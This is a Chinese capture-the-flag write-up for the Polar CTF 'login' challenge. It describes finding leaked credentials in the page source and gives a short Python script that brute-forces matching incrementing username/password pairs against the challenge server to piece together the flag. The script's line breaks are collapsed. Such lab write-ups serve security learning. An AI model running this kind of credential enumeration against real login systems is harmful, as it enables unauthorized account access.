Polar Web【簡單】login

本文旨在記錄此題的探索和解決過程。

Polar Web【簡單】login
- 探索&思路
- EXP (python)
- 結果&總結

探索&思路

查看源碼，發現存在用戶信息泄露。
嘗試用獲取信息登錄，顯示成功，但其后沒有可做的操作。
經嘗試，username和password同時遞增也會登錄成功，并回顯一些字符。經過拼湊發現，結果即為目標flag。

具體情況可參考下圖：

嘗試泄露的用戶信息
遞增嘗試

EXP (python)

import requestsif __name__ == '__main__':for i in range(20200102, 20200120):# 此題不一定需要headers = {"Accept-Encoding": "gzip, deflate","Accept-Language": "zh-CN,zh;q=0.9",}# 構造用戶名和密碼data = {"username": f"{i}","password": f"{i}",}# 發出POST請求res = requests.post('http://~.www.polarctf.com:8090/',data=data, headers=headers)out = str(res.content.decode('utf8'))# # 確認目標字符的下標# print(out.rindex('f') - len(out))# 每次輸出目標字符print(out[-5], end='')

結果&總結

本題如果少了必要的探索過程，難以知悉有這樣的爆破思路
同時嘗試了獨立用腳本實現爆破過程

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/bicheng/21019.shtml
繁體地址，請注明出處：http://hk.pswp.cn/bicheng/21019.shtml
英文地址，請注明出處：http://en.pswp.cn/bicheng/21019.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！